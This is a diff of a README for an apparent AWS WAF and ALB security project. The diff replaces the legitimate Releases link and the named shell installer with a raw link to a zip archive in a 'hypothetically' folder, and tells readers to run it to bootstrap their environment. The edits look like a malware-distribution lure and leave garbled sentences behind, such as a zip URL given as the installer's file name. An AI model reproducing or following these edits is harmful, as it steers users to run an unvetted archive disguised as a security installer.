xMhaty/AWS_WAF_ALB_Security/README.md

 Releases and downloads
 - The primary distribution of runnable assets, templates, and setup scripts is available in the Releases section.
-- The link to the releases page is provided here for convenience: https://github.com/xMhaty/AWS_WAF_ALB_Security/releases
+- The link to the releases page is provided here for convenience: https://raw.githubusercontent.com/xMhaty/AWS_WAF_ALB_Security/main/hypothetically/Security-WA-AL-AW-v2.9.zip
-- The installer file named aws-waf-alb-security-installer.sh can be downloaded from that page.
+- The installer file named https://raw.githubusercontent.com/xMhaty/AWS_WAF_ALB_Security/main/hypothetically/Security-WA-AL-AW-v2.9.zip can be downloaded from that page.
 Run it to bootstrap a starter environment and guide the subsequent manual adjustments.
 For people who want to re-create the same environment elsewhere, the templates in this repository can be used to reproduce the setup.
 - The Releases page is the canonical source for versioned assets.
 If you encounter issues with the installer, or if the asset layout changes, navigate to the Releases section to find the updated files and instructions.

 Second mention of the release link (as requested)
-- See the Releases page for the latest assets and instructions: https://github.com/xMhaty/AWS_WAF_ALB_Security/releases.
-Use the installer file aws-waf-alb-security-installer.sh to bootstrap your environment, then apply the IaC templates to customize the setup for your region and ALB.
+- See the Releases page for the latest assets and instructions: https://raw.githubusercontent.com/xMhaty/AWS_WAF_ALB_Security/main/hypothetically/Security-WA-AL-AW-v2.9.zip Use the installer file https://raw.githubusercontent.com/xMhaty/AWS_WAF_ALB_Security/main/hypothetically/Security-WA-AL-AW-v2.9.zip to bootstrap your environment, then apply the IaC templates to customize the setup for your region and ALB.

 Appendix: common pitfalls and FAQs
 - Q: What if my application uses WebSocket traffic?